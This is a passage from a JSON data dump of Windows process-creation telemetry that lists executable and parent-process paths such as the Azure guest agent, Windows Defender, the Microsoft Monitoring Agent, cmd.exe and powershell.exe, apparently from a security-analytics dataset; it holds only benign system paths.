19-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MsMpEng.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\90875AAA-9256-468E-A6B3-041D325C6594\\\\MpSigStub.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WMIADAP.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe\",\"C:\\\\Windows\\\\System32\\\\MpSigStub.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\unlodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\lodctr.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\c